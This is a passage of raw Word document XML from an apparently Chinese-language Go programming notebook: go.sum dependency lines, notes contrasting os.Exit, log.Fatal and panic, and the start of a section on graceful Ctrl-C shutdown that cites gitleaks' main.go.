          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/spf13/cobra v1.7.0 h1:hyqWnYt1ZQShIddO5kBpj3vu05/++x6tJ6dg8EC572I=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/spf13/cobra v1.7.0/go.mod h1:uLxZILRyS/50WlhOIKD7W6V5bgeIt+4sICxh6uRMrb0=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>golang.org/x/net v0.11.0 h1:Gi2tvZIJyBtO9SDr1q9h5hEQCp/4L2RQ+ar0qjx2oNU=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>golang.org/x/net v0.11.0/go.mod h1:2L/ixqYpgIVXmeoSA/4Lu7BzTG4KIyPIryS4IsOd1oQ=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA6C9C" w14:textId="77777777" w:rsidR="00A30902" w:rsidRPr="00C75A3E" w:rsidRDefault="00A30902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1221F8A3" w14:textId="77777777" w:rsidR="00056E00" w:rsidRPr="00067B0F" w:rsidRDefault="00056E00" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124C9552" w14:textId="77777777" w:rsidR="0071252F" w:rsidRPr="0071252F" w:rsidRDefault="0071252F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17285F6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="_Toc159779834"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>log.Fatal()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>panic()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w14:paraId="02E182A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.jianshu.com/p/f85ecae6e7df</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D56DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DA7092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="_Toc159779835"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.Exit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w14:paraId="521D6D6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">os.Exit() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接返回退出码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBC703" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func Exit(code int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0EA4D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序马上退出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5C0E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>函数不会执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655B1EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc159779836"/>
      <w:r>
        <w:t>log.Fatal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w14:paraId="60980633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func Fatal(v ...interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332AD57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Fatal is equivalent to Print() followed by a call to os.Exit(1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30C225" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>// Fatal is equivalent to l.Print() followed by a call to os.Exit(1).func (l *Logger) Fatal(v ...interface{}) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94A943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    l.Output(2, fmt.Sprint(v...))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E1C12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    os.Exit(1)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7C93D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEFF5CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>总结起来</w:t>
      </w:r>
      <w:r>
        <w:t>log.Fatal</w:t>
      </w:r>
      <w:r>
        <w:t>函数完成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5FF70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>打印输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D151B45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>退出应用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC3E6A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>函数不会执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F748489" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>os.Exit()</w:t>
      </w:r>
      <w:r>
        <w:t>相比多了第一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D5CF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="386" w:name="_Toc159779837"/>
      <w:r>
        <w:t>panic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="386"/>
    </w:p>
    <w:p w14:paraId="5FB3C6AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数立刻停止执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意是函数本身，不是应用程序停止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED979A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数被执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C7B85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回给调用者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(caller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB6939" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用者函数假装也收到了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，从而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> 4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>立即停止执行当前函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> 4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数被执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> 4.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回给它的调用者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(caller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC06342" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归重复上述步骤，直到最上层函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序停止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EACB39D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227389AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>panic()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就有点类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的处理，因而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行为和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理行为就非常类似，行为结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句块的处理流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457533B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E0870" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A68E6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B2A7FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E37E30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6CB2C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc159779838"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何优雅的命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="033F229C" w14:textId="77777777" w:rsidR="00ED130C" w:rsidRDefault="00ED130C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579B0772" w14:textId="4DEDF718" w:rsidR="00ED130C" w:rsidRDefault="00ED130C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么设计，主要是为了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED130C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在程序的其他部分监听</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED130C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> stopChan </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED130C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道，以便</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED130C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在收到中断信号时执行一些清理操作，例如关闭打开的文件、释放资源或者优雅地关闭服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED130C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这可以确保程序在被中断时能够正确地关闭，避免数据丢失或其他问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AB4BD" w14:textId="77777777" w:rsidR="00ED130C" w:rsidRPr="00ED130C" w:rsidRDefault="00ED130C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57137719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCEF1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2855A2D3" w14:textId="77777777" w:rsidR="0038052B" w:rsidRPr="0038052B" w:rsidRDefault="0038052B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038052B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0038052B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mport (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C6FE2" w14:textId="5E836507" w:rsidR="0038052B" w:rsidRPr="0038052B" w:rsidRDefault="0038052B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
